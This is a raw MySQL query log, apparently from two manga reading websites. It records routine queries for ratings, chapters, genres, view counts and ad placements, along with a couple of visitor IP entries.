u317079482_mangacherri_2 using Socket 330661053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330661053 Quit 330661054 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330661054 Quit 330661055 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330661055 Quit 330661056 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330661056 Quit 330661057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330661057 Quit 330661058 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330661058 Quit 330661059 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330661059 Quit 330661060 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330661060 Quit 330661061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330661061 Quit 330661062 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661062 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330661062 Quit 330661063 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330661063 Quit 330661064 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330661064 Quit 330661065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330661065 Quit 330661066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330661066 Quit 330661067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330661067 Quit 330661068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330661068 Quit 330661069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330661069 Quit 330661070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330661070 Quit 330661071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330661071 Quit 330661072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330661072 Quit 330661073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330661073 Quit 330661074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330661074 Quit 330661075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330661075 Quit 330661076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330661076 Quit 330661077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330661077 Quit 330661078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330661078 Quit 330661079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330661079 Quit 330661080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330661080 Quit 330661081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330661081 Quit 330661082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330661082 Quit 330661083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330661083 Quit 330661084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330661084 Quit 330661085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330661085 Quit 330661086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330661086 Quit 330661087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330661087 Quit 330661088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330661088 Quit 330661089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330661089 Quit 330661090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330661090 Quit 330661091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330661091 Quit 330661092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330661092 Quit 330661093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330661093 Quit 330661094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330661094 Quit 330661095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330661095 Quit 330661096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330661096 Quit 330661097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330661097 Quit 330661098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330661098 Quit 330661099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330661099 Quit 330661100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330661100 Quit 330661101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330661101 Quit 330661102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330661102 Quit 330661103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330661103 Quit 330661104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330661104 Quit 330661105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330661105 Quit 330661106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330661106 Quit 330661107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330661107 Quit 330661108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330661108 Quit 330661109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330661109 Quit 330661110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330661110 Quit 330661111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330661111 Quit 330661112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330661112 Quit 330661113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330661113 Quit 330661114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330661114 Quit 330661115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330661115 Quit 330661116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330661116 Quit 330661117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330661117 Quit 330661118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330661118 Quit 330661119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330661119 Quit 330661120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330661120 Quit 330661121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330661121 Quit 330661122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330661122 Quit 260225 19:30:13 330661123 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661124 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661123 Quit 330661124 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10315' and m.active = 1 330661124 Quit 330661125 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661125 Query select * FROM chapters where id = '10315' 330661125 Quit 330661126 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661126 Query select * FROM chapters where manga_id = '206' order by display_priority ASC, id desc 330661126 Quit 330661127 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661127 Query Update chapters set view=view+1 where id = '10315' 330661127 Quit 330661128 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661128 Query select * FROM chapters where id = '10315' 330661128 Quit 330661129 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661129 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10315' and m.active = 1 330661129 Quit 330661130 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661130 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('206', '10315', '216.244.66.201', 'mangaberri.com', '2026-02-26 03:30:13', '2026-02-26 03:30:13') 330661130 Quit 330661131 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661131 Query select * FROM chapter_images where chapter_id = '10315' 330661131 Quit 330661132 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661132 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '206' and m.active = 1 330661132 Quit 330661133 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661133 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='206' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%School%' OR genres like '%Sci-Fi%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 330661133 Quit 330661134 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661135 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661134 Quit 330661135 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330661135 Quit 330661136 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661137 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661136 Quit 330661137 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661137 Quit 330661138 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661139 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661138 Quit 330661139 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661139 Quit 330661140 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661141 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661140 Quit 330661141 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661141 Quit 330660767 Quit 330661142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661142 Query select * FROM comments where manga_id = '346' and parent_id is null order by created desc 330661142 Quit 330661143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661143 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '346' and m.active = 1 330661143 Quit 330661144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661144 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Comedy%' OR m.genres like '%Romance%' OR m.genres like '%School%' OR m.genres like '%Slice of Life%' OR m.genres like '%Supernatural%') group by manga_id ORDER BY sum(view) DESC 330660778 Quit 330661145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661145 Quit 330661146 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330661146 Quit 330661147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661147 Quit 330661148 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661148 Quit 330661149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661149 Quit 330661150 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661150 Quit 330661151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661151 Quit 330661152 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661152 Quit 330661153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661153 Quit 330661154 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4330' 330661154 Quit 330661155 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661155 Query select * FROM chapters where id = '4330' 330661155 Quit 330661156 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661156 Query select * FROM chapters where manga_id = '89' order by id desc 330661156 Quit 330661157 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661157 Query Update chapters set view=view+1 where id = '4330' 330661157 Quit 330661158 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661158 Query select * FROM chapters where id = '4330' 330661158 Quit 330661159 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661159 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4330' 330661159 Quit 330661160 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661160 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('89', '4330', '2404:ab80:2:f663:ccfc:56be:9c8b:d812', 'mangacherri.com', '2026-02-26 03:30:13', '2026-02-26 03:30:13') 330661160 Quit 330661161 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661161 Query select * FROM chapter_images where chapter_id = '4330' 330661161 Quit 330661162 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661162 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '89' and m.active = 1 330661162 Quit 330661163 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661163 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='89' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Manhwa%' OR genres like '%Romance%' OR genres like '%School%') ORDER BY RAND() limit 10 330661144 Quit 330661164 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661165 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661165 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330661164 Quit 330661165 Quit 330661166 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661166 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330661166 Quit 330661167 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661167 Query select * FROM chapters where manga_id = '346' order by created desc limit 1 330661167 Quit 330661168 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330661168 Quit 330661169 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661169 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330661169 Quit 330661170 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330661170 Quit 330661171 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330661171 Quit 330661172 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330661172 Quit 330661173 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330661173 Quit 330661174 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330661174 Quit 330661175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330661175 Quit 330661176 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330661176 Quit 330661177 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330661177 Quit 330661178 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661178 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330661178 Quit 330661179 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661179 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330661179 Quit 330661180 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330661180 Quit 330661181 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661181 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330661181 Quit 330661182 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330661182 Quit 330661183 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661183 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330661183 Quit 330661184 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330661184 Quit 330661185 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330661185 Quit 330661186 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330661186 Quit 330661187 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661187 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330661187 Quit 330661188 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330661188 Quit 330661189 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330661189 Quit 330661190 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330661190 Quit 330661191 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330661191 Quit 330661192 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330661192 Quit 330661193 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330661193 Quit 330661194 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330661194 Quit 330661195 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661195 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330661195 Quit 330661196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330661196 Quit 330661197 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330661197 Quit 330661198 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330661198 Quit 330661199 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330661199 Quit 330661200 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661200 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330661200 Quit 330661201 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330661201 Quit 330661202 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330661202 Quit 330661203 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330661203 Quit 330661204 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330661204 Quit 330661205 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330661205 Quit 330661206 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661206 